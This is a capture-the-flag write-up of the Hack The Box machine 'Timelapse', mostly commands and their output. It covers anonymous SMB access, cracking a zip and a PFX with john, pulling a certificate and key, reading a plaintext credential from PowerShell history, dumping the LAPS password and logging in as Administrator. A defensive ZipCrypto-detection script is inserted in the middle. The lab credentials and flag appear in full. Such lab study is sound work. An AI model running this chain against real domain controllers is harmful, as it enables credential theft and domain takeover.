
HTB Timelapse

Start with nmap.

PORT      STATE SERVICE           VERSION
53/tcp    open  domain            Simple DNS Plus
88/tcp    open  kerberos-sec      Microsoft Windows Kerberos (server time: 2026-02-14 15:35:13Z)
135/tcp   open  msrpc             Microsoft Windows RPC
139/tcp   open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp   open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
3268/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
5986/tcp  open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf            .NET Message Framing
49667/tcp open  msrpc             Microsoft Windows RPC
49673/tcp open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc             Microsoft Windows RPC
49694/tcp open  msrpc             Microsoft Windows RPC
50976/tcp open  msrpc             Microsoft Windows RPC

Judging by the ports this is a DC. SMB is open, so look there first.

# smbclient -L //10.129.248.148
    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    NETLOGON        Disk      Logon server share 
    Shares          Disk      
    SYSVOL          Disk      Logon server share 

Try anonymous access: there is an archive under Shares.

# smbclient -N //10.129.248.148/Shares
smb: \> ls
  .                                   D        0  Mon Oct 25 10:39:15 2021
  ..                                  D        0  Mon Oct 25 10:39:15 2021
  Dev                                 D        0  Mon Oct 25 14:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 10:48:42 2021
        6367231 blocks of size 4096. 1341632 blocks available
smb: \> cd Dev
smb: \Dev\> ls
  .                                   D        0  Mon Oct 25 14:40:06 2021
  ..                                  D        0  Mon Oct 25 14:40:06 2021
  winrm_backup.zip                    A     2611  Mon Oct 25 10:46:42 2021
        6367231 blocks of size 4096. 1341632 blocks available

Download and extract it. It asks for a password, so try cracking it.

# zip2john winrm_backup.zip > hash.txt
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8
# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx)
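The zip2john line above reports "Encr: TS_chk", i.e. the archive uses the legacy PKWARE ZipCrypto scheme, which is why a wordlist run finishes in seconds. The following is an added example, not part of the original writeup or any tool it uses: a small parser for ZIP local file headers that flags entries protected only by ZipCrypto (general-purpose flag bit 0 set, method other than 99) versus WinZip AES (method 99 with an 0x9901 extra field). The sample archive is constructed inline with placeholder names; the parser assumes sizes are stored in the local header rather than in a trailing data descriptor.

```python
import struct

# ZIP structure constants (PKWARE APPNOTE): local file header signature,
# general-purpose flag bit 0 = encrypted, method 99 = WinZip AES (AE-x),
# extra field 0x9901 carries the AES key strength and the real method.
LOCAL_HEADER_SIG = 0x04034B50
LOCAL_HEADER_FMT = "<IHHHHHIIIHH"   # 30 bytes
FLAG_ENCRYPTED = 0x0001
AES_METHOD = 99
AES_EXTRA_ID = 0x9901
AES_STRENGTH = {1: 128, 2: 192, 3: 256}


def build_local_entry(name: bytes, data: bytes, method: int,
                      encrypted: bool, extra: bytes = b"") -> bytes:
    """Construct one local file header + payload for the sample archive.
    Sizes are written in the header (no data descriptor); CRC/time left zero."""
    flags = FLAG_ENCRYPTED if encrypted else 0
    header = struct.pack(LOCAL_HEADER_FMT, LOCAL_HEADER_SIG, 20, flags, method,
                         0, 0, 0, len(data), len(data), len(name), len(extra))
    return header + name + extra + data


def aes_extra_field(strength: int, real_method: int) -> bytes:
    """0x9901 extra field: vendor version 2, vendor 'AE', strength, real method."""
    return struct.pack("<HHH2sBH", AES_EXTRA_ID, 7, 2, b"AE", strength, real_method)


# Constructed sample archive with three entries; none of it comes from a real backup.
SAMPLE_ZIP = (
    build_local_entry(b"legacy_backup.pfx", b"\x00" * 16, method=8, encrypted=True)
    + build_local_entry(b"notes.txt", b"hello", method=0, encrypted=False)
    + build_local_entry(b"modern_backup.pfx", b"\x00" * 16, method=AES_METHOD,
                        encrypted=True, extra=aes_extra_field(3, 8))
)


def parse_aes_strength(extra: bytes) -> int:
    """Walk the extra-field list and return the AES strength byte (0 if absent)."""
    off = 0
    while off + 4 <= len(extra):
        field_id, size = struct.unpack_from("<HH", extra, off)
        if field_id == AES_EXTRA_ID and size >= 7:
            # data = vendor version (2) + vendor id (2) + strength (1) + method (2)
            return extra[off + 4 + 4]
        off += 4 + size
    return 0


def inspect_zip(blob: bytes) -> list:
    """Return one dict per local entry: name, encrypted flag and scheme."""
    entries = []
    off = 0
    while off + 30 <= len(blob):
        fields = struct.unpack_from(LOCAL_HEADER_FMT, blob, off)
        if fields[0] != LOCAL_HEADER_SIG:
            break                      # reached the central directory or junk
        _, _, flags, method, _, _, _, csize, _, nlen, xlen = fields
        name = blob[off + 30: off + 30 + nlen].decode("utf-8", "replace")
        extra = blob[off + 30 + nlen: off + 30 + nlen + xlen]
        encrypted = bool(flags & FLAG_ENCRYPTED)
        scheme = "none"
        if encrypted:
            if method == AES_METHOD:
                scheme = f"AES-{AES_STRENGTH.get(parse_aes_strength(extra), '?')}"
            else:
                scheme = "ZipCrypto"   # legacy PKWARE cipher, offline-crackable
        entries.append({"name": name, "encrypted": encrypted, "scheme": scheme})
        off += 30 + nlen + xlen + csize
    return entries


def weak_entries(blob: bytes) -> list:
    """Names of entries protected only by legacy ZipCrypto."""
    return [e["name"] for e in inspect_zip(blob) if e["scheme"] == "ZipCrypto"]


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_ZIP
    for e in inspect_zip(blob):
        print(f"{e['name']:24} encrypted={e['encrypted']!s:5} scheme={e['scheme']}")
```

Run it against a backup archive before it lands on a share: anything listed by weak_entries is only as safe as the password's resistance to a wordlist, regardless of what it contains.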

Extracting gives legacyy_dev_auth.pfx, which also needs a password. Keep cracking.

# pfx2john legacyy_dev_auth.pfx > pfx_hash
# john --wordlist=/usr/share/wordlists/rockyou.txt pfx_hash
thuglegacy       (legacyy_dev_auth.pfx)     

Convert the certificate format and extract the certificate and private key.

openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out certificate.pem
openssl x509 -in certificate.pem -out certificate.crt
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -nodes -out pair.key
openssl rsa -in pair.key -out pri.key
openssl rsa -in pair.key -pubout -out pub.key

Connect.

evil-winrm -S -k pri.key -c certificate.crt -i 10.129.248.148

Checking the PowerShell history turns up something interesting.

*Evil-WinRM* PS C:\Users\legacyy\Desktop> Get-Content C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit

That gives a username and password. Look at the svc_deploy user.

*Evil-WinRM* PS C:\Users\legacyy\Desktop> net user svc_deploy
<...>
Global Group memberships     *LAPS_Readers         *Domain Users

It is a member of LAPS_Readers; going by the name, that group should be able to read the LAPS password.

# nxc ldap 10.129.248.148 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -M laps
SMB         10.129.248.148  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
LDAP        10.129.248.148  389    DC01             [+] timelapse.htb\svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV
LAPS        10.129.248.148  389    DC01             [*] Getting LAPS Passwords
LAPS        10.129.248.148  389    DC01             Computer:DC01$ User:                Password:M!b%0&9+kr$5e;Uc;JUR@4h$

Got the password; log in.

evil-winrm -i 10.129.248.148 -u Administrator -p 'M!b%0&9+kr$5e;Uc;JUR@4h$' -S

Find the flag.

*Evil-WinRM* PS C:\Users\TRX\Desktop> ls
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        2/14/2026   7:27 AM             34 root.txt
*Evil-WinRM* PS C:\Users\TRX\Desktop> type root.txt
d4fd28c0a225eba58f2b9ec3f841f7c9

Takeaways: password cracking, gathering information from PowerShell history, and reading passwords via LAPS_Readers.

License: CC BY 4.0